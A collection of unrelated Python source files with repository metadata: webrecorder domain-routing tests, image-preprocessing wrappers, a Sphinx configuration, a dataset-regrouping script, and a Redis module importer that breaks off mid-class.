webrecorder/test/test_app_content_domain.py
|
gitter-badger/webrecorder
|
9c4fc3b816a77f312ec864ca8598f7bbc1b41394
|
[
"Apache-2.0"
] | 1
|
2021-01-01T21:32:53.000Z
|
2021-01-01T21:32:53.000Z
|
webrecorder/test/test_app_content_domain.py
|
n0ncetonic/webrecorder
|
7459a0f6bc162eec2d383bd908d82d95cdc15940
|
[
"Apache-2.0"
] | null | null | null |
webrecorder/test/test_app_content_domain.py
|
n0ncetonic/webrecorder
|
7459a0f6bc162eec2d383bd908d82d95cdc15940
|
[
"Apache-2.0"
] | null | null | null |
from .testutils import FullStackTests
import os
import re
# ============================================================================
class TestAppContentDomain(FullStackTests):
"""
Tests for separate app/content domain deployment
"""
runner_env_params = {'TEMP_SLEEP_CHECK': '1',
'APP_HOST': 'app-host',
'CONTENT_HOST': 'content-host'}
anon_user = None
@classmethod
def setup_class(cls, **kwargs):
os.environ['CONTENT_HOST'] = 'content-host'
os.environ['APP_HOST'] = 'app-host'
kwargs['init_anon'] = False
super(TestAppContentDomain, cls).setup_class(**kwargs)
@classmethod
def teardown_class(cls, *args, **kwargs):
super(TestAppContentDomain, cls).teardown_class(*args, **kwargs)
os.environ['CONTENT_HOST'] = ''
os.environ['APP_HOST'] = ''
def app_get(self, url):
url = url.format(user=self.anon_user)
headers = {'Host': 'app-host'}
return self.testapp.get(url, headers={'Host': 'app-host'})
def content_get(self, url):
url = url.format(user=self.anon_user)
return self.testapp.get(url, headers={'Host': 'content-host'})
def test_home_page_redir_to_app(self):
res = self.content_get('/')
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/'
def test_record_app_top_frame(self):
res = self.app_get('/_new/temp/rec/record/http://httpbin.org/get?food=bar')
res = self.app_get(res.headers['Location'])
assert res.status_code == 200
m = re.search('temp-[\w\d]+', res.text)
TestAppContentDomain.anon_user = m.group(0)
assert 'wbinfo.app_prefix = decodeURI("http://app-host/{user}/temp/rec/record/");'.format(user=self.anon_user) in res.text
assert 'wbinfo.content_prefix = decodeURI("http://content-host/{user}/temp/rec/record/");'.format(user=self.anon_user) in res.text
def test_record_set_session_content_frame(self):
res = self.content_get('/{user}/temp/rec/record/mp_/http://httpbin.org/get?food=bar')
assert res.status_code == 302
assert 'http://app-host/_set_session' in res.headers['Location']
res = self.app_get(res.headers['Location'])
assert res.status_code == 302
assert 'http://content-host/_set_session' in res.headers['Location']
res = self.content_get(res.headers['Location'])
content_host_str = 'http://content-host/{user}/temp/rec/record/mp_/http://httpbin.org/get?food=bar'.format(user=self.anon_user)
assert res.status_code == 302
assert self.testapp.cookies['__test_sesh'] in res.headers['Set-Cookie']
assert res.headers['Location'] == content_host_str
res = self.content_get(res.headers['Location'])
assert '"food": "bar"' in res.text
def test_replay_app_frame(self):
res = self.app_get('/{user}/temp/http://httpbin.org/get?food=bar')
assert res.headers.get('Content-Security-Policy') == None
assert 'wbinfo.app_prefix = decodeURI("http://app-host/{user}/temp/");'.format(user=self.anon_user) in res.text
assert 'wbinfo.content_prefix = decodeURI("http://content-host/{user}/temp/");'.format(user=self.anon_user) in res.text
def test_replay_content_frame(self):
res = self.content_get('/{user}/temp/mp_/http://httpbin.org/get?food=bar')
assert '"food": "bar"' in res.text
csp = "default-src 'unsafe-eval' 'unsafe-inline' 'self' data: blob: mediastream: ws: wss: app-host/_set_session; form-action 'self'"
assert res.headers['Content-Security-Policy'] == csp
def test_redir_to_content_frame(self):
res = self.app_get('/{user}/temp/mp_/http://httpbin.org/get?food=bar')
assert res.status_code == 302
assert res.headers['Location'] == 'http://content-host/{user}/temp/mp_/http://httpbin.org/get?food=bar'.format(user=self.anon_user)
def test_redir_to_app_frame(self):
res = self.content_get('/{user}/temp/http://httpbin.org/get?food=bar')
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/{user}/temp/http://httpbin.org/get?food=bar'.format(user=self.anon_user)
def test_app_coll_page(self):
res = self.app_get('/{user}/temp/'.format(user=self.anon_user))
assert res.status_code == 200
def test_content_redir_to_app_user_page(self):
res = self.content_get('/{user}'.format(user=self.anon_user))
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/{user}'.format(user=self.anon_user)
def test_content_redir_to_app_coll_page(self):
res = self.content_get('/{user}/temp/'.format(user=self.anon_user))
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/{user}/temp/'.format(user=self.anon_user)
def test_options_allow_content_domain_set_session(self):
res = self.testapp.options('/_set_session?path=/{user}/temp/http://httpbin.org/'.format(user=self.anon_user),
headers={'Host': 'app-host',
'Origin': 'http://content-host/',
'Access-Control-Request-Headers': 'x-pywb-requested-with',
'Access-Control-Request-Method': 'GET'})
assert res.headers['Access-Control-Allow-Origin'] == 'http://content-host/'
assert res.headers['Access-Control-Allow-Methods'] == 'GET'
assert res.headers['Access-Control-Allow-Headers'] == 'x-pywb-requested-with'
assert res.headers['Access-Control-Allow-Credentials'] == 'true'
def test_options_dont_allow_wrong_host(self):
res = self.testapp.options('/_set_session?path=/{user}/temp/http://httpbin.org/'.format(user=self.anon_user),
headers={'Host': 'content-host',
'Origin': 'http://content-host/',
'Access-Control-Request-Headers': 'x-pywb-requested-with',
'Access-Control-Request-Method': 'GET'})
assert 'Access-Control-Allow-Origin' not in res.headers
def test_options_dont_allow_wrong_origin(self):
res = self.testapp.options('/_set_session?path=/{user}/temp/http://httpbin.org/'.format(user=self.anon_user),
headers={'Host': 'app-host',
'Origin': 'http://wrong-host/',
'Access-Control-Request-Headers': 'x-pywb-requested-with',
'Access-Control-Request-Method': 'GET'})
assert 'Access-Control-Allow-Origin' not in res.headers
| 48.584507
| 140
| 0.607624
|
2ce2ea2a9fb4e71b4ed0f2a96142d969e2993b95
| 136
|
py
|
Python
|
test/test_utils.py
|
Funk66/ledger
|
b06f39281b81cebb75a6c5f92fa3b8e47b65800c
|
[
"MIT"
] | null | null | null |
test/test_utils.py
|
Funk66/ledger
|
b06f39281b81cebb75a6c5f92fa3b8e47b65800c
|
[
"MIT"
] | 3
|
2021-11-16T06:38:48.000Z
|
2021-11-16T06:43:18.000Z
|
test/test_utils.py
|
Funk66/ledger
|
b06f39281b81cebb75a6c5f92fa3b8e47b65800c
|
[
"MIT"
] | null | null | null |
from datetime import date
from ledger.utils import isodate
def test_isodate():
assert date(2020, 2, 20) == isodate('2020-02-20')
| 17
| 53
| 0.713235
|
754a84a0e70a4f9a2a165fd48f20861ee8961f3d
| 14,122
|
py
|
Python
|
pyzoo/zoo/feature/image/imagePreprocessing.py
|
abdolence/analytics-zoo
|
364856abcbe9aff7f7b6cf9b9f8648d51e07ca64
|
[
"Apache-2.0"
] | 2
|
2018-06-08T01:14:48.000Z
|
2019-08-28T22:24:14.000Z
|
pyzoo/zoo/feature/image/imagePreprocessing.py
|
abdolence/analytics-zoo
|
364856abcbe9aff7f7b6cf9b9f8648d51e07ca64
|
[
"Apache-2.0"
] | 3
|
2018-10-19T08:30:38.000Z
|
2018-10-19T08:32:12.000Z
|
pyzoo/zoo/feature/image/imagePreprocessing.py
|
abdolence/analytics-zoo
|
364856abcbe9aff7f7b6cf9b9f8648d51e07ca64
|
[
"Apache-2.0"
] | 1
|
2018-06-26T08:16:42.000Z
|
2018-06-26T08:16:42.000Z
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from bigdl.util.common import *
from zoo.feature.common import Preprocessing
if sys.version >= '3':
long = int
unicode = str
class ImagePreprocessing(Preprocessing):
"""
ImagePreprocessing is a transformer that transform ImageFeature
"""
def __init__(self, bigdl_type="float", *args):
super(ImagePreprocessing, self).__init__(bigdl_type, *args)
class ImageBytesToMat(ImagePreprocessing):
"""
Transform byte array(original image file in byte) to OpenCVMat
:param byte_key key that maps byte array
:param image_codec specifying the color type of a loaded image, same as in OpenCV.imread.
By default is Imgcodecs.CV_LOAD_IMAGE_UNCHANGED
"""
def __init__(self, byte_key="bytes", image_codec=-1, bigdl_type="float"):
super(ImageBytesToMat, self).__init__(bigdl_type, byte_key, image_codec)
class ImageResize(ImagePreprocessing):
"""
Resize image
:param resize_h height after resize
:param resize_w width after resize
:param resize_mode if resizeMode = -1, random select a mode from (Imgproc.INTER_LINEAR,
Imgproc.INTER_CUBIC, Imgproc.INTER_AREA, Imgproc.INTER_NEAREST, Imgproc.INTER_LANCZOS4)
:param use_scale_factor if true, scale factor fx and fy is used, fx = fy = 0
note that the result of the following are different
Imgproc.resize(mat, mat, new Size(resizeWH, resizeWH), 0, 0, Imgproc.INTER_LINEAR)
Imgproc.resize(mat, mat, new Size(resizeWH, resizeWH))
"""
def __init__(self, resize_h, resize_w, resize_mode=1, use_scale_factor=True,
bigdl_type="float"):
super(ImageResize, self).__init__(bigdl_type, resize_h, resize_w,
resize_mode, use_scale_factor)
class ImageBrightness(ImagePreprocessing):
"""
adjust the image brightness
:param deltaLow brightness parameter: low bound
:param deltaHigh brightness parameter: high bound
"""
def __init__(self, delta_low, delta_high, bigdl_type="float"):
super(ImageBrightness, self).__init__(bigdl_type, float(delta_low), float(delta_high))
class ImageChannelNormalize(ImagePreprocessing):
"""
image channel normalize
:param mean_r mean value in R channel
:param mean_g mean value in G channel
:param meanB_b mean value in B channel
:param std_r std value in R channel
:param std_g std value in G channel
:param std_b std value in B channel
"""
def __init__(self, mean_r, mean_g, mean_b, std_r=1.0,
std_g=1.0, std_b=1.0, bigdl_type="float"):
super(ImageChannelNormalize, self).__init__(bigdl_type, float(mean_r), float(mean_g),
float(mean_b), float(std_r), float(std_g),
float(std_b))
class PerImageNormalize(ImagePreprocessing):
"""
Normalizes the norm or value range per image, similar to opencv::normalize
https://docs.opencv.org/ref/master/d2/de8/group__core__array.html
#ga87eef7ee3970f86906d69a92cbf064bd
ImageNormalize normalizes scale and shift the input features. Various normalize
methods are supported,
Eg. NORM_INF, NORM_L1, NORM_L2 or NORM_MINMAX
Pleas notice it's a per image normalization.
:param min lower range boundary in case of the range normalization or
norm value to normalize
:param max upper range boundary in case of the range normalization.
It is not used for the norm normalization.
:param norm_type normalization type, see opencv:NormTypes.
https://docs.opencv.org/ref/master/d2/de8/group__core__array.html
#gad12cefbcb5291cf958a85b4b67b6149f
Default Core.NORM_MINMAX
"""
def __init__(self, min, max, norm_type=32, bigdl_type="float"):
super(PerImageNormalize, self).__init__(bigdl_type, float(min), float(max), norm_type)
class ImageMatToTensor(ImagePreprocessing):
"""
MatToTensor
:param toRGB BGR to RGB (default is BGR)
:param tensorKey key to store transformed tensor
:param format DataFormat.NCHW or DataFormat.NHWC
"""
def __init__(self, to_RGB=False, tensor_key="imageTensor",
share_buffer=True, format="NCHW", bigdl_type="float"):
super(ImageMatToTensor, self).__init__(bigdl_type, to_RGB, tensor_key,
share_buffer, format)
class ImageSetToSample(ImagePreprocessing):
"""
transform imageframe to samples
:param input_keys keys that maps inputs (each input should be a tensor)
:param target_keys keys that maps targets (each target should be a tensor)
:param sample_key key to store sample
"""
def __init__(self, input_keys=["imageTensor"], target_keys=None,
sample_key="sample", bigdl_type="float"):
super(ImageSetToSample, self).__init__(bigdl_type, input_keys, target_keys, sample_key)
class ImageHue(ImagePreprocessing):
"""
adjust the image hue
:param deltaLow hue parameter: low bound
:param deltaHigh hue parameter: high bound
"""
def __init__(self, delta_low, delta_high, bigdl_type="float"):
super(ImageHue, self).__init__(bigdl_type, float(delta_low), float(delta_high))
class ImageSaturation(ImagePreprocessing):
"""
adjust the image Saturation
:param deltaLow brightness parameter: low bound
:param deltaHigh brightness parameter: high bound
"""
def __init__(self, delta_low, delta_high, bigdl_type="float"):
super(ImageSaturation, self).__init__(bigdl_type, float(delta_low), float(delta_high))
class ImageChannelOrder(ImagePreprocessing):
"""
random change the channel of an image
"""
def __init__(self, bigdl_type="float"):
super(ImageChannelOrder, self).__init__(bigdl_type)
class ImageColorJitter(ImagePreprocessing):
"""
Random adjust brightness, contrast, hue, saturation
:param brightness_prob probability to adjust brightness
:param brightness_delta brightness parameter
:param contrast_prob probability to adjust contrast
:param contrast_lower contrast lower parameter
:param contrast_upper contrast upper parameter
:param hue_prob probability to adjust hue
:param hue_delta hue parameter
:param saturation_prob probability to adjust saturation
:param saturation_lower saturation lower parameter
:param saturation_upper saturation upper parameter
:param random_order_prob random order for different operation
:param shuffle shuffle the transformers
"""
def __init__(self, brightness_prob=0.5,
brightness_delta=32.0,
contrast_prob=0.5,
contrast_lower=0.5,
contrast_upper=1.5,
hue_prob=0.5,
hue_delta=18.0,
saturation_prob=0.5,
saturation_lower=0.5,
saturation_upper=1.5,
random_order_prob=0.0,
shuffle=False,
bigdl_type="float"):
super(ImageColorJitter, self).__init__(bigdl_type,
float(brightness_prob), float(brightness_delta),
float(contrast_prob), float(contrast_lower),
float(contrast_upper), float(hue_prob),
float(hue_delta), float(saturation_prob),
float(saturation_lower), float(saturation_upper),
float(random_order_prob), shuffle)
class ImageAspectScale(ImagePreprocessing):
"""
Resize the image, keep the aspect ratio. scale according to the short edge
:param min_size scale size, apply to short edge
:param scale_multiple_of make the scaled size multiple of some value
:param max_size max size after scale
:param resize_mode if resizeMode = -1, random select a mode from
(Imgproc.INTER_LINEAR, Imgproc.INTER_CUBIC, Imgproc.INTER_AREA,
Imgproc.INTER_NEAREST, Imgproc.INTER_LANCZOS4)
:param use_scale_factor if true, scale factor fx and fy is used, fx = fy = 0
:aram min_scale control the minimum scale up for image
"""
def __init__(self, min_size, scale_multiple_of=1, max_size=1000,
resize_mode=1, use_scale_factor=True, min_scale=-1.0,
bigdl_type="float"):
super(ImageAspectScale, self).__init__(bigdl_type,
min_size, scale_multiple_of, max_size,
resize_mode, use_scale_factor, min_scale)
class ImageRandomAspectScale(ImagePreprocessing):
"""
resize the image by randomly choosing a scale
:param scales array of scale options that for random choice
:param scaleMultipleOf Resize test images so that its width and height are multiples of
:param maxSize Max pixel size of the longest side of a scaled input image
"""
def __init__(self, scales, scale_multiple_of=1, max_size=1000, bigdl_type="float"):
super(ImageRandomAspectScale, self).__init__(bigdl_type,
scales, scale_multiple_of, max_size)
class ImagePixelNormalize(ImagePreprocessing):
"""
Pixel level normalizer, data(i) = data(i) - mean(i)
:param means pixel level mean, following H * W * C order
"""
def __init__(self, means, bigdl_type="float"):
super(ImagePixelNormalize, self).__init__(bigdl_type, means)
class ImageRandomCrop(ImagePreprocessing):
"""
Random crop a `cropWidth` x `cropHeight` patch from an image.
The patch size should be less than the image size.
:param crop_width width after crop
:param crop_height height after crop
:param is_clip whether to clip the roi to image boundaries
"""
def __init__(self, crop_width, crop_height, is_clip=True, bigdl_type="float"):
super(ImageRandomCrop, self).__init__(bigdl_type,
crop_width, crop_height, is_clip)
class ImageCenterCrop(ImagePreprocessing):
"""
Crop a `cropWidth` x `cropHeight` patch from center of image.
The patch size should be less than the image size.
:param crop_width width after crop
:param crop_height height after crop
:param is_clip clip cropping box boundary
"""
def __init__(self, crop_width, crop_height, is_clip=True, bigdl_type="float"):
super(ImageCenterCrop, self).__init__(bigdl_type,
crop_width, crop_height, is_clip)
class ImageFixedCrop(ImagePreprocessing):
"""
Crop a fixed area of image
:param x1 start in width
:param y1 start in height
:param x2 end in width
:param y2 end in height
:param normalized whether args are normalized, i.e. in range [0, 1]
:param is_clip whether to clip the roi to image boundaries
"""
def __init__(self, x1, y1, x2, y2, normalized=True, is_clip=True, bigdl_type="float"):
super(ImageFixedCrop, self).__init__(bigdl_type,
x1, y1, x2, y2, normalized, is_clip)
class ImageExpand(ImagePreprocessing):
"""
expand image, fill the blank part with the meanR, meanG, meanB
:param means_r means in R channel
:param means_g means in G channel
:param means_b means in B channel
:param min_expand_ratio min expand ratio
:param max_expand_ratio max expand ratio
"""
def __init__(self, means_r=123, means_g=117, means_b=104,
min_expand_ratio=1.0,
max_expand_ratio=4.0, bigdl_type="float"):
super(ImageExpand, self).__init__(bigdl_type, means_r, means_g, means_b,
min_expand_ratio, max_expand_ratio)
class ImageFiller(ImagePreprocessing):
"""
Fill part of image with certain pixel value
:param start_x start x ratio
:param start_y start y ratio
:param end_x end x ratio
:param end_y end y ratio
:param value filling value
"""
def __init__(self, start_x, start_y, end_x, end_y, value=255, bigdl_type="float"):
super(ImageFiller, self).__init__(bigdl_type, start_x, start_y,
end_x, end_y, value)
class ImageHFlip(ImagePreprocessing):
"""
Flip the image horizontally
"""
def __init__(self, bigdl_type="float"):
super(ImageHFlip, self).__init__(bigdl_type)
class ImageFeatureToTensor(Preprocessing):
"""
a Transformer that convert ImageFeature to a Tensor.
"""
def __init__(self, bigdl_type="float"):
super(ImageFeatureToTensor, self).__init__(bigdl_type)
class RowToImageFeature(Preprocessing):
"""
a Transformer that converts a Spark Row to a BigDL ImageFeature.
"""
def __init__(self, bigdl_type="float"):
super(RowToImageFeature, self).__init__(bigdl_type)
class ImageRandomPreprocessing(Preprocessing):
"""
Randomly apply the preprocessing to some of the input ImageFeatures, with probability specified.
E.g. if prob = 0.5, the preprocessing will apply to half of the input ImageFeatures.
:param preprocessing preprocessing to apply.
:param prob probability to apply the preprocessing action.
"""
def __init__(self, preprocessing, prob, bigdl_type="float"):
super(ImageRandomPreprocessing, self).__init__(bigdl_type, preprocessing, float(prob))
| 39.227778
| 100
| 0.673276
|
f49ac961339d04644665f2d9828d7db9048de93a
| 10,668
|
py
|
Python
|
doc/conf.py
|
bio-phys/cadishi
|
b44351fcb77737c6a6da5249a0c24ee8e34f72d2
|
[
"MIT"
] | 14
|
2017-08-22T13:00:42.000Z
|
2021-11-19T14:07:55.000Z
|
doc/conf.py
|
bio-phys/cadishi
|
b44351fcb77737c6a6da5249a0c24ee8e34f72d2
|
[
"MIT"
] | 1
|
2021-11-19T14:07:38.000Z
|
2021-11-19T14:07:38.000Z
|
doc/conf.py
|
bio-phys/cadishi
|
b44351fcb77737c6a6da5249a0c24ee8e34f72d2
|
[
"MIT"
] | null | null | null |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# CADISHI --- CAlculation of DIStance HIstograms
#
# Copyright (c) Klaus Reuter, Juergen Koefinger
# See the file AUTHORS.rst for the full list of contributors.
#
# Released under the MIT License, see the file LICENSE.txt.
# CADISHI documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 15 09:03:45 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# We handle version information in a single file as is commonly done, see e.g.
# https://packaging.python.org/single_source_version/#single-sourcing-the-version
ver = {}
with open("../cadishi/version.py") as fp:
exec(fp.read(), ver)
version_string = ver['get_short_version_string']()
release_string = ver['get_version_string']()
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.viewcode'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'CADISHI'
copyright = u'2017, Klaus Reuter, Juergen Koefinger'
author = u'Klaus Reuter, Juergen Koefinger'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
#version = u'1.0'
version = version_string
# The full version, including alpha/beta/rc tags.
#release = u'1.0.0'
release = release_string
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**/.git', '**/.unison', '.unison']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
# html_theme = 'classic'
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'CADISHI v1.0.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'CADISHIdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'CADISHI.tex', u'CADISHI Documentation',
u'Klaus Reuter, Juergen Koefinger', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'cadishi', u'CADISHI Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'CADISHI', u'CADISHI Documentation',
author, 'CADISHI', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| 29.469613
| 91
| 0.706599
|
ac8fe7d7507974528ee5e54d89288f51fd8d4d33
| 129
|
py
|
Python
|
things/config.py
|
kxnes/things
|
8b97aff8c7e7f80314f99a8974338b96720b2fd6
|
[
"MIT"
] | null | null | null |
things/config.py
|
kxnes/things
|
8b97aff8c7e7f80314f99a8974338b96720b2fd6
|
[
"MIT"
] | null | null | null |
things/config.py
|
kxnes/things
|
8b97aff8c7e7f80314f99a8974338b96720b2fd6
|
[
"MIT"
] | 1
|
2020-06-22T17:51:45.000Z
|
2020-06-22T17:51:45.000Z
|
# == Auth == #
AUTH_TOKEN_HEADER = 'X-Semrush-Test'
AUTH_TOKEN_VALUE = 'DSJAKJSAKSKLFLA-LK'
# == Pagination == #
PER_PAGE = 10
| 16.125
| 39
| 0.666667
|
f0cb9ff2bf205534312bdaa5fc8546ca5ddc972a
| 1,317
|
py
|
Python
|
codes/data_scripts/regroup_SDR4K_sub.py
|
Yangzhen0000/EDVR
|
388ae869a1b4e2e6399f5feeea1f3acc969a3c75
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/regroup_SDR4K_sub.py
|
Yangzhen0000/EDVR
|
388ae869a1b4e2e6399f5feeea1f3acc969a3c75
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/regroup_SDR4K_sub.py
|
Yangzhen0000/EDVR
|
388ae869a1b4e2e6399f5feeea1f3acc969a3c75
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import glob
import os.path as osp
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from utils.util import ProgressBar
dataset_path = '../../datasets/SDR4k/train/SDR_10BIT_sub/'
video_path_list = glob.glob(os.path.join(dataset_path, '*'))
pbar = ProgressBar(len(video_path_list))
for video_path in video_path_list:
print('Processing video', video_path)
frame_path_list = glob.glob(os.path.join(video_path, '*'))
# print(frame_path_list)
patch_name_list = sorted(os.listdir(frame_path_list[0]))
# print(patch_name_list)
video_path, video_name = os.path.split(video_path)
# print(video_path, video_name)
for patch_name in patch_name_list:
save_name = '{}_{}'.format(video_name, os.path.splitext(patch_name)[0])
save_dir = os.path.join(video_path, save_name)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
print("Making dir {}".format(save_dir))
for frame_path in frame_path_list:
frame_name = '{}.png'.format(osp.basename(frame_path))
os.system('mv {} {}'.format(os.path.join(frame_path, patch_name), osp.join(save_dir, frame_name)))
# print('mv {} {}'.format(os.path.join(frame_path, patch_name), osp.join(save_dir, frame_name)))
pbar.update()
| 42.483871
| 110
| 0.690205
|
7e27bfbcc90c8dc55b8f91c1637844f77b15ebfd
| 986
|
py
|
Python
|
modulepackage/redisimport/redisloader.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/redisimport/redisloader.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/redisimport/redisloader.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
# redisloader.py
import redis
import importlib.util
class RedisImporter(object):
def __init__(self, *args, **kwargs):
self.conn = redis.Redis(*args, **kwargs)
self.conn.exists('test')
def find_spec(self, name, path, target=None):
origin = name + '.py'
if self.conn.exists(origin):
loader = RedisLoader(origin, self.conn)
return importlib.util.spec_from_loader(name, loader)
return None
def enable(*args, **kwargs):
import sys
sys.meta_path.insert(0, RedisImporter(*args, **kwargs))
class RedisLoader(object):
def __init__(self, origin, conn):
self.origin = origin
self.conn = conn
def create_module(self, spec):
